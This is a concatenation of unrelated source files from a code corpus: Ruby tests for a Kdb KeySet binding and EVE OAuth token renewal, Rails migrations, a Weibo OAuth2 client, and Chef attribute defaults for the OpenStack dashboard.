assert_nil ks.tail
end
end
def test_keySet_each_enumeralbe
assert_nothing_raised do
a = Array.new
# create test keys
a << Kdb::Key.new("user/k0", value: "v0", owner: "me")
a << Kdb::Key.new("user/k1", value: "v1", owner: "you")
a << Kdb::Key.new("user/k2", value: "v2", owner: "john", m2: "a")
a << Kdb::Key.new("user/k3", value: "v3", owner: "jane")
a << Kdb::Key.new("user/k4", value: "v4", owner: "max")
a << Kdb::Key.new("user/k5", value: "v5", owner: "bob", m2: "b")
a << Kdb::Key.new("user/k6", value: "v6", owner: "alice")
a << Kdb::Key.new("user/k7", value: "v7", owner: "fritz", m3: "c")
a << Kdb::Key.new("user/k8", value: "v8", owner: "anton")
a << Kdb::Key.new("user/k9", value: "v9", owner: "berta")
ks = Kdb::KeySet.new
# populate keySet
a.each { |e| ks << e }
assert_equal 10, ks.size
# this will only work, if test keys have key names in desc order
i = 0
ks.each do |e|
assert a[i] == e
i += 1
end
assert_equal 10, i
# test Enumerable mixin
assert ks.all? { |e| e.namespace == "user" }
assert ks.all? { |e| e.has_meta? "owner" }
assert ks.all? { |e| e.is_string? }
assert ! ks.all? { |e| e.value == "v0" }
assert ks.any? { |e| e.value == "v0" }
k = ks.find { |e| e.name == "user/k5" }
assert_instance_of Kdb::Key, k
assert k.is_valid?
assert ! k.is_null?
assert_equal "user/k5", k.name
assert a[5] == k
k = ks.find { |e| e.name == "does_not_exist" }
assert_nil k
assert_equal 2, ks.count { |e| e.has_meta? "m2" }
tmpa = ks.find_all { |e| e.has_meta? "m2" }
assert_instance_of Array, tmpa
assert_equal 2, tmpa.size
assert_equal a[2], tmpa[0]
assert_equal a[5], tmpa[1]
# test Enumerable #min, #max
assert_equal a[9], ks.max
assert_equal a[0], ks.min
# owner: you is maximum
assert_equal a[1], ks.max_by { |e| e["owner"] }
# our each impl makes inplace modifications
ks.each { |e| e["new_meta"] = "persisted" }
assert ks.all? { |e| e.has_meta? "new_meta" }
assert ks.all? { |e| e["new_meta"] == "persisted" }
# ensure KeySet cursor is unmodified after 'each' call
ks.rewind
assert_equal (-1), ks.cursor
ks.each { |e| e }
assert_equal (-1), ks.cursor
ks.next
assert_equal 0, ks.cursor
ks.next
assert_equal 1, ks.cursor
ks.each { |e| e }
assert_equal 1, ks.cursor
ks.cursor = 5
assert_equal 5, ks.cursor
ks.each { |e| e }
assert_equal 5, ks.cursor
end
end
def test_keySet_comparison
assert_nothing_raised do
a = (1..5).map { |i| Kdb::Key.new "user/key#{i}" }
ks1 = Kdb::KeySet.new a
ks2 = Kdb::KeySet.new a
assert_equal ks1.size, ks2.size
assert_equal ks1[0], ks2[0]
assert_equal ks1[1], ks2[1]
assert_equal ks1[2], ks2[2]
assert_equal ks1[3], ks2[3]
assert_equal ks1[4], ks2[4]
assert ks1 == ks2
assert ! ks1 != ks2
assert ks1.eql?(ks2)
assert ks2.eql?(ks1)
ks2 << Kdb::Key.new("user/key100")
assert ks1 != ks2
assert ! ks1.eql?(ks2)
assert ! ks2.eql?(ks1)
end
end
def test_keySet_lookup_lookupByName
assert_nothing_raised do
ks = Kdb::KeySet.new (1..10).map { |i| Kdb::Key.new("user/key%02d" % i) }
assert_equal 10, ks.size
# lookupByName
assert_equal "user/key01", ks.lookup("user/key01").name
assert_equal Kdb::Key.new("user/key02"), ks.lookup("user/key02")
# lookup
assert_equal "user/key03", ks.lookup(Kdb::Key.new "user/key03").name
# lookup unknown key
assert_nil ks.lookup("user/key_now_in_keyset")
assert_nil ks.lookup(Kdb::Key.new "user/key_now_in_keyset")
# with options
lookupkey = Kdb::Key.new "user/key05"
assert_equal lookupkey, ks.lookup(lookupkey, Kdb::KDB_O_POP)
assert_equal 9, ks.size
assert_nil ks.lookup(lookupkey)
end
end
def test_keySet_dup_or_clone
assert_nothing_raised do
a = (0..4).map { |i| Kdb::Key.new "user/key#{i}" }
ks = Kdb::KeySet.new a
assert_equal 5, ks.size
ks_dup = ks.dup
assert_equal ks.size, ks_dup.size
assert ks == ks_dup
assert ks.__id__ != ks_dup.__id__
ks_dup << Kdb::Key.new("user/key5")
assert_equal 5, ks.size
assert_equal 6, ks_dup.size
assert_equal "user/key4", ks.tail.name
assert_equal "user/key5", ks_dup.tail.name
assert_equal a[4], ks.pop
assert_equal 4, ks.size
assert_equal 6, ks_dup.size
assert_equal "user/key3", ks.tail.name
assert_equal "user/key5", ks_dup.tail.name
# however, its just a shallow copy, thus modifying keys has effect
# to both key sets
assert_equal "", ks[1].value
assert_equal "", ks_dup[1].value
new_value = "some important value"
ks[1].value = new_value
assert_equal new_value, ks[1].value
assert_equal new_value, ks_dup[1].value
end
end
def test_keySet_cut
assert_nothing_raised do
ks = Kdb::KeySet.new [
Kdb::Key.new("user/app1/setting1"),
Kdb::Key.new("user/app1/setting2"),
Kdb::Key.new("user/app1/setting3"),
Kdb::Key.new("user/app2/setting1"),
Kdb::Key.new("user/app2/common/setting1"),
Kdb::Key.new("user/app2/common/setting2"),
Kdb::Key.new("user/app2/setting2"),
Kdb::Key.new("user/app3/setting1")
]
assert_equal 8, ks.size
app2 = ks.cut Kdb::Key.new("user/app2")
assert_equal 4, app2.size
assert_equal 4, ks.size
assert_equal "user/app1/setting1", ks[0].name
assert_equal "user/app1/setting2", ks[1].name
assert_equal "user/app1/setting3", ks[2].name
assert_equal "user/app3/setting1", ks[3].name
assert_equal "user/app2/common/setting1", app2[0].name
assert_equal "user/app2/common/setting2", app2[1].name
assert_equal "user/app2/setting1", app2[2].name
assert_equal "user/app2/setting2", app2[3].name
app4 = ks.cut Kdb::Key.new("user/app4")
assert_equal 4, ks.size
assert_equal 0, app4.size
end
end
def test_keySet_to_array
assert_nothing_raised do
ks = Kdb::KeySet.new (0..5).map { |i| Kdb::Key.new "user/key#{i}" }
a = ks.to_a
assert_instance_of Kdb::KeySet, ks
assert_instance_of Array, a
assert_equal ks.size, a.size
for i in (0..5) do
assert_equal ks[i], a[i]
end
end
end
def test_keySet_empty
assert_nothing_raised do
ks = Kdb::KeySet.new
assert ks.empty?
ks << Kdb::Key.new("user/k1")
assert ! ks.empty?
ks << Kdb::Key.new("user/k2")
assert ! ks.empty?
ks.pop
assert ! ks.empty?
ks.pop
assert ks.empty?
ks.pop
assert ks.empty?
end
end
def test_keySet_length
assert_nothing_raised do
ks = Kdb::KeySet.new
assert_equal 0, ks.size
assert_equal 0, ks.length
ks << Kdb::Key.new("user/k1")
assert_equal 1, ks.size
assert_equal 1, ks.length
(2..10).map do |i|
ks << Kdb::Key.new("user/sw/org/my_app/k#{i}")
assert_equal i, ks.size
assert_equal i, ks.length
end
(0..9).reverse_each do |i|
assert_not_nil ks.pop
assert_equal i, ks.size
assert_equal i, ks.length
end
# to be explicite
assert_equal 0, ks.size
assert_equal 0, ks.length
assert_nil ks.pop
assert_equal 0, ks.size
assert_equal 0, ks.length
end
end
def test_keySet_delete_by_index
assert_nothing_raised do
a = (0..9).map { |i|
Kdb::Key.new "user/sw/org/my_app/k#{i}"
}
ks = Kdb::KeySet.new a
assert_equal 10, ks.size
k = ks.delete_at 5
ak = a.delete_at 5
assert_equal 9, ks.size
assert_equal ak, k
k = ks.delete_at 0
ak = a.delete_at 0
assert_equal 8, ks.size
assert_equal ak, k
assert_equal a[0], ks.head
k = ks.delete_at(ks.size - 1)
ak = a.delete_at(a.size - 1)
assert_equal 7, ks.size
assert_equal ak, k
assert_equal a[a.size - 1], ks.tail
assert_nil ks.delete_at 10
end
end
def test_keySet_delete_by_lookup
assert_nothing_raised do
a = (0..9).map { |i|
Kdb::Key.new "user/sw/org/my_app/k#{i}"
}
ks = Kdb::KeySet.new a
assert_equal 10, ks.size
ak = a.delete_at 5
# delete by key
k = ks.delete ak
assert_equal ak, k
assert_equal 9, ks.size
ak = a.delete_at 0
k = ks.delete ak
assert_equal ak, k
assert_equal 8, ks.size
assert_nil ks.delete(Kdb::Key.new "user/doesn_t_exist")
# delete by name
ak = a.delete_at 0
k = ks.delete "user/sw/org/my_app/k1"
assert_equal ak, k
assert_equal 7, ks.size
ak = a.delete_at 6
k = ks.delete "user/sw/org/my_app/k9"
assert_equal ak, k
assert_equal 6, ks.size
assert_nil ks.delete("user/doesn_t_exist")
end
end
def test_keySet_to_s
assert_nothing_raised do
ks = Kdb::KeySet.new
assert_equal '', ks.to_s
ks << Kdb::Key.new("user/k1", value: "v1")
assert_equal "user/k1: v1", ks.to_s
ks << Kdb::Key.new("user/k2", value: "v2")
assert_equal "user/k1: v1, user/k2: v2", ks.to_s
ks << Kdb::Key.new("user/k3", flags: Kdb::KEY_BINARY, value: "\x00\x00")
expected = "user/k1: v1, user/k2: v2, user/k3: (binary) length: 2"
assert_equal expected, ks.to_s
end
end
def test_keySet_pretty_print
assert_nothing_raised do
ks = Kdb::KeySet.new
out, err = capture_output { ks.pretty_print }
assert_equal '', out
assert_equal '', err
ks << Kdb::Key.new("user/k1", value: "v1")
ks << Kdb::Key.new("user/k2", value: "v2")
ks << Kdb::Key.new("user/k3", value: "v3")
out, err = capture_output { ks.pretty_print }
expected = <<EOF
user/k1: v1
user/k2: v2
user/k3: v3
EOF
assert_equal expected, out
assert_equal '', err
end
end
end
| 22.495376 | 79 | 0.582301 |
4ad6ffe323c2feb26ae2b33310e0466e190cf16c | 3,827 | require "rails_helper"
describe Eve::AccessToken, type: :model do
describe "#expired?" do
subject { described_class.new(character).expired? }
let(:character) { instance_double(Character, token_expired?: true) }
it { is_expected.to eq true }
context "when not expired" do
let(:character) { instance_double(Character, token_expired?: false) }
it { is_expected.to eq false }
end
end
describe "#renew!" do
subject { described_class.new(character).renew! }
let(:character) { create(:character, :with_expired_token) }
let(:oauth_token) do
stub_oauth_token(
token: "new-token",
expires_at: 1.day.from_now.midnight,
refresh_token: "new-refresh-token"
)
end
before do
allow(oauth_token).to receive(:refresh!).and_return(oauth_token)
end
it "updates character's access token" do
expect { subject }.to change { character.reload.token }.to("new-token")
end
it "updates character's refresh token" do
expect { subject }.to change { character.reload.refresh_token }.to("new-refresh-token")
end
it "updates character's token expiration time" do
expect { subject }
.to change { character.reload.token_expires_at }.to(1.day.from_now.midnight)
end
context "with current token still valid" do
let(:character) { create(:character) }
it "does not update character's access token" do
expect { subject }.not_to change { character.reload.token }
end
it "does not update character's refresh token" do
expect { subject }.not_to change { character.reload.refresh_token }
end
it "does not update character's token expiration time" do
expect { subject }.not_to change { character.reload.token_expires_at }
end
it "does not send requests to ESI" do
expect(subject).to satisfy do
expect(oauth_token).not_to have_received(:refresh!)
end
end
end
%w[
invalid_token
invalid_grant
].each do |error_code|
context "when esi responds with #{error_code} error" do
before do
oauth_error = stubbed_oauth_error(error_code)
allow(oauth_token).to receive(:refresh!).and_raise(oauth_error)
end
it "voids character's refresh token" do
expect { subject }.to raise_error do
expect(character).to be_refresh_token_voided
end
end
it "raises an error" do
expect { subject }.to raise_error(described_class::Error, /#{error_code}/)
end
end
end
%w[
invalid_request
invalid_client
unsupported_grant_type
invalid_scope
].each do |error_code|
context "when esi responds with #{error_code} error" do
before do
oauth_error = stubbed_oauth_error(error_code)
allow(oauth_token).to receive(:refresh!).and_raise(oauth_error)
end
it "raises an error" do
expect { subject }.to raise_error(described_class::Error, /#{error_code}/)
end
it "does not void character's refresh token" do
expect { subject }.to raise_error do
expect(character).not_to be_refresh_token_voided
end
end
end
end
end
def stub_oauth_token(token:, refresh_token: nil, expires_at: nil)
instance_spy(
OAuth2::AccessToken,
token: token || "token-abc",
expires_at: expires_at || 1.day.from_now,
refresh_token: refresh_token || "refresh-token-abc"
).tap do |stubbed_token|
allow(OAuth2::AccessToken).to receive(:from_hash).and_return(stubbed_token)
end
end
def stubbed_oauth_error(code)
OAuth2::Error.allocate.tap do |e|
e.instance_variable_set(:@code, code)
end
end
end
| 28.774436 | 93 | 0.644892 |
b9cbefaab185215180422c8fc24634954ebd07f9 | 70 | class Mood < ActiveRecord::Base
validates :name, presence: true
end
| 17.5 | 33 | 0.757143 |
87a2ec7572b2a01f8e0942e28cacad8ff2869a2e | 295 | class CreateLikes < ActiveRecord::Migration[6.0]
def change
create_table :likes do |t|
t.integer :user_id
t.references :likeable, polymorphic: true, index: true
t.timestamps
end
add_index :likes, [:user_id, :likeable_type, :likeable_id], unique: true
end
end
| 22.692308 | 76 | 0.681356 |
ab81bc988abff74a47e42e4bcf4970d06c653270 | 163 | class CreateSubmissionRecords < ActiveRecord::Migration
def change
create_table :submission_records do |t|
t.timestamps null: false
end
end
end
| 18.111111 | 55 | 0.736196 |
217d441498b76adfd20f6a495374cd66dd55e54f | 878 | # frozen_string_literal: true
RSpec.describe "attribute definition" do
before do
@t12n = T12n.start
end
it "defined attributes must provide a block" do
expect do
@t12n.define_schema :x do
define_attr :a
end
end.to raise_error(T12n::ArgumentError, "No block given")
end
it "arity of defined attributes cannot be more than one" do
expect do
@t12n.define_schema :x do
define_attr(:a) { |x, y| }
end
end.to raise_error(T12n::ArgumentError, "Unexpected proc arity: 2")
end
it "attribute serializers have an arity of one" do
@t12n.define_schema :x do
attrs(:attr1)
define_attr(:attr2) { }
define_attr(:attr3) { |obj| }
define_attr(:attr4, &:y)
end
arities = @t12n.fetch_schema(:x).attrs.map { |a| a.serializer.arity }
expect(arities).to eq([1, 1, 1, 1])
end
end
| 23.72973 | 73 | 0.638952 |
260532b9f7dafe3288b977bf7ed4ef5ed4dd541e | 743 | module GitCompound
module Worker
# Worker that checks if unwanted circular dependency exists
#
class CircularDependencyChecker < Worker
def visit_component(component)
@element = component
raise_error if circular_dependency_exists?
end
def visit_manifest(manifest)
@element = manifest
raise_error if circular_dependency_exists?
end
private
def circular_dependency_exists?
@element.ancestors.include?(@element)
end
def raise_error
name = @element.name
type = @element.class.name.downcase
raise CircularDependencyError,
"Circular dependency detected in #{type} `#{name}`!"
end
end
end
end
| 23.21875 | 66 | 0.651413 |
ace25dc243afd366663f060a15eef7d52c39a0bf | 3,168 | require 'oauth2'
module WeiboOAuth2
class Client < OAuth2::Client
def initialize(client_id='', client_secret='', opts={}, &block)
client_id = WeiboOAuth2::Config.api_key if client_id.empty?
client_secret = WeiboOAuth2::Config.api_secret if client_secret.empty?
super
@site = "https://api.weibo.com/2/"
@options[:authorize_url] = '/oauth2/authorize'
@options[:token_url] = '/oauth2/access_token'
end
def authorize_url(params={})
params[:client_id] = @id unless params[:client_id]
params[:response_type] = 'code' unless params[:response_type]
params[:redirect_uri] = WeiboOAuth2::Config.redirect_uri unless params[:redirect_uri]
super
end
def get_token(params, access_token_opts={})
params = params.merge({:parse => :json})
access_token_opts = access_token_opts.merge({:header_format => "OAuth2 %s", :param_name => "access_token"})
super
end
def get_and_restore_token(params, access_token_opts={})
@access_token = get_token(params, access_token_opts={})
end
def get_token_from_hash(hash)
access_token = hash.delete('access_token') || hash.delete(:access_token)
opts = {:expires_at => hash["expires"] ||hash[:expires],
:header_format => "OAuth2 %s",
:param_name => "access_token"}
@access_token = WeiboOAuth2::AccessToken.new(self, access_token, opts)
end
def authorized?
!!@access_token
end
def users
@users ||= WeiboOAuth2::Api::V2::Users.new(@access_token) if @access_token
end
def statuses
@statues ||= WeiboOAuth2::Api::V2::Statuses.new(@access_token) if @access_token
end
def comments
@comments ||= WeiboOAuth2::Api::V2::Comments.new(@access_token) if @access_token
end
def friendships
@friendships ||= WeiboOAuth2::Api::V2::Friendships.new(@access_token) if @access_token
end
def account
@account ||= WeiboOAuth2::Api::V2::Account.new(@access_token) if @access_token
end
def favorites
@favorites ||= WeiboOAuth2::Api::V2::Favorites.new(@access_token) if @access_token
end
def trends
@trends ||= WeiboOAuth2::Api::V2::Trends.new(@access_token) if @access_token
end
def tags
@tags ||= WeiboOAuth2::Api::V2::Tags.new(@access_token) if @access_token
end
def register
@register ||= WeiboOAuth2::Api::V2::Register.new(@access_token) if @access_token
end
def search
@search ||= WeiboOAuth2::Api::V2::Search.new(@access_token) if @access_token
end
def short_url
@short_url ||= WeiboOAuth2::Api::V2::ShortUrl.new(@access_token) if @access_token
end
def suggestions
@suggestions ||= WeiboOAuth2::Api::V2::Suggestions.new(@access_token) if @access_token
end
def remind
@remind ||= WeiboOAuth2::Api::V2::Remind.new(@access_token) if @access_token
end
def auth_code
@auth_code ||= WeiboOAuth2::Strategy::AuthCode.new(self)
end
end
end | 31.058824 | 113 | 0.631944 |
2800f44745ceb42204caa621b1744e3f95a0268f | 713 | # NOTE:
#
# Uses the value of node['private_chef']['postgresql']['username'] as
# the user to run the database-creation psql command
def whyrun_supported?
true
end
use_inline_resources
action :create do
EcPostgres.with_connection(node) do |connection|
result = connection.exec("SELECT datname FROM pg_database WHERE datname='#{new_resource.database}'")
if result.ntuples == 0
converge_by("Create database #{new_resource.database}") do
owner = "WITH OWNER #{new_resource.owner}" if new_resource.owner
connection.exec("CREATE DATABASE \"#{new_resource.database}\" #{owner} TEMPLATE #{new_resource.template} ENCODING '#{new_resource.encoding}';")
end
end
end
end
| 31 | 153 | 0.71669 |
ed44aac27098a324343eb35fa653c8cd1e7ac1dc | 2,956 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2019_02_01
module Models
#
# Information gained from troubleshooting of specified resource.
#
class TroubleshootingDetails
include MsRestAzure
# @return [String] The id of the get troubleshoot operation.
attr_accessor :id
# @return [String] Reason type of failure.
attr_accessor :reason_type
# @return [String] A summary of troubleshooting.
attr_accessor :summary
# @return [String] Details on troubleshooting results.
attr_accessor :detail
# @return [Array<TroubleshootingRecommendedActions>] List of recommended
# actions.
attr_accessor :recommended_actions
#
# Mapper for TroubleshootingDetails class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'TroubleshootingDetails',
type: {
name: 'Composite',
class_name: 'TroubleshootingDetails',
model_properties: {
id: {
client_side_validation: true,
required: false,
serialized_name: 'id',
type: {
name: 'String'
}
},
reason_type: {
client_side_validation: true,
required: false,
serialized_name: 'reasonType',
type: {
name: 'String'
}
},
summary: {
client_side_validation: true,
required: false,
serialized_name: 'summary',
type: {
name: 'String'
}
},
detail: {
client_side_validation: true,
required: false,
serialized_name: 'detail',
type: {
name: 'String'
}
},
recommended_actions: {
client_side_validation: true,
required: false,
serialized_name: 'recommendedActions',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'TroubleshootingRecommendedActionsElementType',
type: {
name: 'Composite',
class_name: 'TroubleshootingRecommendedActions'
}
}
}
}
}
}
}
end
end
end
end
| 29.267327 | 86 | 0.492896 |
87cbbbc546f0decfd2de65c3ce878c490a4d1f2f | 1,252 | module OldAWS
module S3
# Entities in S3 have an associated owner (the person who created them). The owner is a canonical representation of an
# entity in the S3 system. It has an <tt>id</tt> and a <tt>display_name</tt>.
#
# These attributes can be used when specifying a ACL::Grantee for an ACL::Grant.
#
# You can retrieve the owner of the current account by calling Owner.current.
class Owner
undef_method :id if method_defined?(:id) # Get rid of Object#id
include SelectiveAttributeProxy
class << self
# The owner of the current account.
def current
response = Service.get('/')
new(response.parsed['owner']) if response.parsed['owner']
end
memoized :current
end
def initialize(attributes = {}) #:nodoc:
@attributes = attributes
end
def ==(other_owner) #:nodoc:
hash == other_owner.hash
end
def hash #:nodoc
[id, display_name].join.hash
end
private
def proxiable_attribute?(name)
valid_attributes.include?(name)
end
def valid_attributes
%w(id display_name)
end
end
end
end | 28.454545 | 123 | 0.594249 |
ed91deb4c73bcfb75ebca4443f12a8a524b178d5 | 2,682 | require File.expand_path('../boot', __FILE__)
# Pick the frameworks you want:
# require "active_record/railtie"
require "action_controller/railtie"
require "action_mailer/railtie"
require "active_resource/railtie"
require "sprockets/railtie"
require "rails/test_unit/railtie"
Bundler.require
require "bootstrap_active_nav"
module Dummy
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Custom directories with classes and modules you want to be autoloadable.
# config.autoload_paths += %W(#{config.root}/extras)
# Only load the plugins named here, in the order given (default is alphabetical).
# :all can be used as a placeholder for all plugins not explicitly named.
# config.plugins = [ :exception_notification, :ssl_requirement, :all ]
# Activate observers that should always be running.
# config.active_record.observers = :cacher, :garbage_collector, :forum_observer
# Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
# Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
# config.time_zone = 'Central Time (US & Canada)'
# The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
# config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
# config.i18n.default_locale = :de
# Configure the default encoding used in templates for Ruby 1.9.
config.encoding = "utf-8"
# Configure sensitive parameters which will be filtered from the log file.
config.filter_parameters += [:password]
# Use SQL instead of Active Record's schema dumper when creating the database.
# This is necessary if your schema can't be completely dumped by the schema dumper,
# like if you have constraints or database-specific column types
# config.active_record.schema_format = :sql
# Enforce whitelist mode for mass assignment.
# This will create an empty whitelist of attributes available for mass-assignment for all models
# in your app. As such, your models will need to explicitly whitelist or blacklist accessible
# parameters by using an attr_accessible or attr_protected declaration.
# config.active_record.whitelist_attributes = true
# Enable the asset pipeline
config.assets.enabled = true
# Version of your assets, change this if you want to expire all your assets
config.assets.version = '1.0'
end
end
| 42.571429 | 100 | 0.740492 |
18cd47406aff6a240eedc514691f8c68cdf67e3c | 182 | class CreateMessages < ActiveRecord::Migration[5.0]
def change
create_table :messages do |t|
t.string :name
t.string :message
t.timestamps
end
end
end
| 16.545455 | 51 | 0.653846 |
f897943bdb202d45a5f4cc68490cbaee0e6db42f | 2,283 | #
# Copyright 2014-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
require 'fluent/plugin/kinesis'
require 'fluent/plugin/kinesis_helper/aggregator'
module Fluent
module Plugin
class KinesisStreamsAggregatedOutput < KinesisOutput
Fluent::Plugin.register_output('kinesis_streams_aggregated', self)
include KinesisHelper::Aggregator::Mixin
RequestType = :streams_aggregated
BatchRequestLimitCount = 100_000
BatchRequestLimitSize = 1024 * 1024
include KinesisHelper::API::BatchRequest
config_param :stream_name, :string
config_param :fixed_partition_key, :string, default: nil
def configure(conf)
super
@partition_key_generator = create_partition_key_generator
@batch_request_max_size -= offset
@max_record_size -= offset
end
def format(tag, time, record)
format_for_api do
[@data_formatter.call(tag, time, record)]
end
end
def write(chunk)
write_records_batch(chunk) do |batch|
key = @partition_key_generator.call
records = batch.map{|(data)|data}
client.put_records(
stream_name: @stream_name,
records: [{
partition_key: key,
data: aggregator.aggregate(records, key),
}],
)
end
end
def offset
@offset ||= AggregateOffset + @partition_key_generator.call.size*2
end
private
def size_of_values(record)
super(record) + RecordOffset
end
def create_partition_key_generator
if @fixed_partition_key.nil?
->() { SecureRandom.hex(16) }
else
->() { @fixed_partition_key }
end
end
end
end
end
| 28.898734 | 78 | 0.657468 |
01ca3f93bd5d0f8492b65bd595091e75907b760c | 10,516 | # encoding: UTF-8
#
# Cookbook Name:: openstack-dashboard
# Attributes:: default
#
# Copyright 2012, AT&T, Inc.
# Copyright 2013-2014, IBM, Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Set to some text value if you want templated config files
# to contain a custom banner at the top of the written file
default['openstack']['dashboard']['custom_template_banner'] = '
# This file autogenerated by Chef
# Do not edit, changes will be overwritten
'
default['openstack']['dashboard']['debug'] = false
# The Keystone role used by default for users logging into the dashboard
default['openstack']['dashboard']['keystone_default_role'] = '_member_'
# This is the name of the Chef role that will install the Keystone Service API
default['openstack']['dashboard']['keystone_service_chef_role'] = 'keystone'
default['openstack']['dashboard']['server_hostname'] = nil
default['openstack']['dashboard']['use_ssl'] = false
default['openstack']['dashboard']['ssl']['cert_url'] = nil
default['openstack']['dashboard']['ssl']['key_url'] = nil
# When using a remote certificate and key, the names of the actual installed certificate
# and key in the file system are determined by the following two attributes.
# If you want the name of the installed files to match the name of the files from the URL,
# they need to be manually set below, if not the conventional horizon.* names will be used.
default['openstack']['dashboard']['ssl']['cert'] = 'horizon.pem'
default['openstack']['dashboard']['ssl']['key'] = 'horizon.key'
# List of hosts/domains the dashboard can serve. This should be changed, a '*'
# allows everything
default['openstack']['dashboard']['allowed_hosts'] = ['*']
default['openstack']['dashboard']['swift']['enabled'] = 'False'
default['openstack']['dashboard']['theme'] = 'default'
default['openstack']['dashboard']['apache']['sites-path'] = "#{node['apache']['dir']}/openstack-dashboard"
default['openstack']['dashboard']['http_port'] = 80
default['openstack']['dashboard']['https_port'] = 443
default['openstack']['dashboard']['secret_key_content'] = nil
default['openstack']['dashboard']['webroot'] = '/'
case node['platform_family']
when 'fedora', 'rhel'
default['openstack']['dashboard']['horizon_user'] = 'apache'
default['openstack']['dashboard']['horizon_group'] = 'apache'
default['openstack']['dashboard']['secret_key_path'] = '/usr/share/openstack-dashboard/openstack_dashboard/local/.secret_key_store'
default['openstack']['dashboard']['ssl']['dir'] = '/etc/pki/tls'
default['openstack']['dashboard']['local_settings_path'] = '/etc/openstack-dashboard/local_settings'
default['openstack']['dashboard']['django_path'] = '/usr/share/openstack-dashboard'
default['openstack']['dashboard']['login_url'] = "#{node['openstack']['dashboard']['webroot']}auth/login/"
default['openstack']['dashboard']['logout_url'] = "#{node['openstack']['dashboard']['webroot']}auth/logout/"
default['openstack']['dashboard']['login_redirect_url'] = node['openstack']['dashboard']['webroot']
# TODO(shep) - Fedora does not generate self signed certs by default
default['openstack']['dashboard']['platform'] = {
'mysql_python_packages' => ['MySQL-python'],
'db2_python_packages' => %w{python-ibm-db python-ibm-db-django python-ibm-db-sa},
'postgresql_python_packages' => ['python-psycopg2'],
'sqlite_python_packages' => [],
'horizon_packages' => ['openstack-dashboard'],
'memcache_python_packages' => ['python-memcached'],
'package_overrides' => ''
}
if node['platform_family'] == 'fedora'
default['openstack']['dashboard']['apache']['sites-path'] = "#{node["apache"]["dir"]}/conf.d/openstack-dashboard.conf"
else
default['openstack']['dashboard']['apache']['sites-path'] = "#{node["apache"]["dir"]}/sites-available/openstack-dashboard"
end
when 'suse'
default['openstack']['dashboard']['horizon_user'] = 'wwwrun'
default['openstack']['dashboard']['horizon_group'] = 'www'
default['openstack']['dashboard']['secret_key_path'] = '/srv/www/openstack-dashboard/openstack_dashboard/local/.secret_key_store'
default['openstack']['dashboard']['ssl']['dir'] = '/etc/ssl'
default['openstack']['dashboard']['local_settings_path'] = '/srv/www/openstack-dashboard/openstack_dashboard/local/local_settings.py'
default['openstack']['dashboard']['django_path'] = '/srv/www/openstack-dashboard'
default['openstack']['dashboard']['login_url'] = nil
default['openstack']['dashboard']['logout_url'] = nil
default['openstack']['dashboard']['login_redirect_url'] = nil
default['openstack']['dashboard']['platform'] = {
'mysql_python_packages' => ['python-mysql'],
'postgresql_python_packages' => ['python-psycopg2'],
'sqlite_python_packages' => [],
'horizon_packages' => ['openstack-dashboard'],
'memcache_python_packages' => ['python-python-memcached'],
'package_overrides' => ''
}
default['openstack']['dashboard']['apache']['sites-path'] = "#{node["apache"]["dir"]}/conf.d/openstack-dashboard.conf"
when 'debian'
default['openstack']['dashboard']['horizon_user'] = 'horizon'
default['openstack']['dashboard']['horizon_group'] = 'horizon'
default['openstack']['dashboard']['secret_key_path'] = '/var/lib/openstack-dashboard/secret_key'
default['openstack']['dashboard']['ssl']['dir'] = '/etc/ssl'
default['openstack']['dashboard']['local_settings_path'] = '/etc/openstack-dashboard/local_settings.py'
default['openstack']['dashboard']['django_path'] = '/usr/share/openstack-dashboard'
default['openstack']['dashboard']['login_url'] = nil
default['openstack']['dashboard']['logout_url'] = nil
default['openstack']['dashboard']['login_redirect_url'] = nil
default['openstack']['dashboard']['platform'] = {
'mysql_python_packages' => ['python-mysqldb'],
'postgresql_python_packages' => ['python-psycopg2'],
'memcache_python_packages' => ['python-memcache'],
'sqlite_python_packages' => [],
'package_overrides' => "-o Dpkg::Options::='--force-confold' -o Dpkg::Options::='--force-confdef'"
}
# lessc became node-less in 12.10
if node['lsb']['release'] > '12.04'
default['openstack']['dashboard']['apache']['sites-path'] = "#{node["apache"]["dir"]}/sites-available/openstack-dashboard.conf"
default['openstack']['dashboard']['platform']['horizon_packages'] = ['node-less', 'openstack-dashboard']
else
default['openstack']['dashboard']['apache']['sites-path'] = "#{node["apache"]["dir"]}/sites-available/openstack-dashboard"
default['openstack']['dashboard']['platform']['horizon_packages'] = ['lessc', 'openstack-dashboard']
end
end
default['openstack']['dashboard']['dash_path'] = "#{node['openstack']['dashboard']['django_path']}/openstack_dashboard"
if node['platform_family'] == 'suse'
default['openstack']['dashboard']['static_path'] = "#{node['openstack']['dashboard']['dash_path']}/static"
default['openstack']['dashboard']['stylesheet_path'] = "#{node['openstack']['dashboard']['dash_path']}/templates/_stylesheets.html"
else
default['openstack']['dashboard']['static_path'] = "#{node['openstack']['dashboard']['django_path']}/static"
default['openstack']['dashboard']['stylesheet_path'] = '/usr/share/openstack-dashboard/openstack_dashboard/templates/_stylesheets.html'
end
